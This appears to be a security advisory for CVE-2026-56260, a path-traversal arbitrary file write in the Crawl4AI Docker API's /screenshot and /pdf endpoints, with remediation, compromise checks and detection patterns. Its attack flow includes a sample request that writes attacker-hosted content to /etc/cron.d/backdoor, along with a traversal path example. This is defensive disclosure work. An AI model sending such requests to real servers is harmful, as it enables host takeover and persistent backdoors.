Executive Summary
A critical arbitrary file write vulnerability (CVE-2026-56260) has been disclosed in Crawl4AI, the popular open-source AI-powered web crawler. The flaw carries a CVSS score of 9.1 and affects all versions before 0.8.7 when the Docker API server is in use.
The vulnerability resides in the /screenshot and /pdf endpoints of the Crawl4AI Docker API. The output_path parameter is accepted without any validation, allowing an attacker to supply absolute paths or path-traversal sequences (e.g. ../../etc/cron.d/evil) to write attacker-controlled content to any location writable by the container process — which often includes sensitive host filesystem locations when Docker volumes are mounted.
CVSS Score: 9.1 (Critical)
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-56260 |
| CVSS Score | 9.1 (Critical) |
| Type | Arbitrary File Write / Path Traversal |
| Attack Vector | Network |
| Privileges Required | None (unauthenticated API access) |
| User Interaction | None |
| Affected Component | Docker API server — /screenshot and /pdf endpoints |
| Fixed In | Crawl4AI 0.8.7 |
Affected Versions
| Package | Affected Versions | Fixed Version |
|---|---|---|
| crawl4ai (Docker API) | < 0.8.7 | 0.8.7 |
Technical Details
The Crawl4AI Docker API server exposes endpoints to render web pages as screenshots and PDFs. Both endpoints accept an output_path parameter that specifies where the output file should be saved. In versions before 0.8.7, this parameter is passed directly to the underlying file write operation without sanitization or path restriction.
Attack Flow
1. Attacker sends POST request to Crawl4AI Docker API:
POST /screenshot
{"url": "https://attacker.com/payload", "output_path": "/etc/cron.d/backdoor"}
2. Crawl4AI renders the page and writes output to the attacker-specified path
3. Content is written to /etc/cron.d/backdoor on the container filesystem
(or on the host if volumes are mounted, which is common in Docker deployments)
4. Depending on what is mounted or shared, attacker achieves:
- Persistent cron execution on the host
- Overwrite of config files (SSH authorized_keys, sudoers, etc.)
- Webshell deployment if web root is accessible
- Data destruction by overwriting critical filesWhy Docker Deployments Are High-Risk
Most real-world Crawl4AI Docker deployments mount host directories for output persistence. A typical docker run invocation like:
docker run -v /host/output:/app/output -p 11235:11235 unclecode/crawl4ai...exposes the host's /host/output directory. If the attacker can navigate to that or any other mounted path, they write directly to the host filesystem.
Impact Assessment
| Impact | Description |
|---|---|
| Arbitrary File Write | Write any content to any path accessible by the container |
| Remote Code Execution | Via cron injection, SSH key injection, or webshell placement |
| Host Compromise | If host directories are volume-mounted (common deployment pattern) |
| Data Destruction | Overwrite critical system files |
| Persistence | Backdoor via cron or authorized_keys |
| Privilege Escalation | Overwrite sudoers or setuid binaries if accessible |
Remediation
Step 1: Update to Crawl4AI 0.8.7
# Pull the latest Docker image
docker pull unclecode/crawl4ai:latest
# Or with a pinned version
docker pull unclecode/crawl4ai:0.8.7
# If using pip (Python package)
pip install --upgrade crawl4aiVerify the running version:
docker exec <crawl4ai-container> python -c "import crawl4ai; print(crawl4ai.__version__)"Step 2: Restrict Network Access to the API
If you cannot immediately update, restrict access to the Crawl4AI Docker API port:
# Bind to localhost only (prevents external network access)
docker run -p 127.0.0.1:11235:11235 unclecode/crawl4ai
# Or use a firewall rule
ufw deny 11235Step 3: Audit Volume Mounts
Review all Docker volume mounts in your Crawl4AI deployment:
docker inspect <crawl4ai-container> | grep -A 20 '"Mounts"'Remove or restrict any host mounts that expose sensitive directories (/etc, /root, /home, web roots, etc.).
Step 4: Check for Indicators of Compromise
# Look for recently modified system files
find /etc /var/spool/cron /root/.ssh -newer /tmp -type f 2>/dev/null
# Check for unexpected cron entries
crontab -l
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/
# Look for unauthorized SSH keys
cat /root/.ssh/authorized_keys
cat /home/*/.ssh/authorized_keys 2>/dev/null
# Check for new SUID binaries
find / -perm -4000 -newer /tmp -type f 2>/dev/nullDetection
Monitor for the following indicators:
| Indicator | Description |
|---|---|
POST requests to /screenshot or /pdf with absolute/traversal output_path | Active exploitation attempt |
Unexpected files in /etc/cron.d/, /root/.ssh/, or web roots | Possible successful exploitation |
| New or modified files owned by the container user outside the expected output directory | Post-exploitation persistence |
| Unusual outbound network connections from the Crawl4AI container | Post-exploitation callback |
Sample log detection pattern (nginx/traefik):
POST /screenshot.*output_path=(\.\./|/)
POST /pdf.*output_path=(\.\./|/)
Temporary Mitigations (If Immediate Patch Is Not Possible)
- Block external access to the Crawl4AI API port at the firewall/network level
- Remove sensitive volume mounts from the container definition
- Run the container as a non-root user with minimal filesystem permissions
- Deploy a WAF rule blocking requests where
output_pathcontains/or.. - Enable Docker read-only filesystem mode:
docker run --read-only ...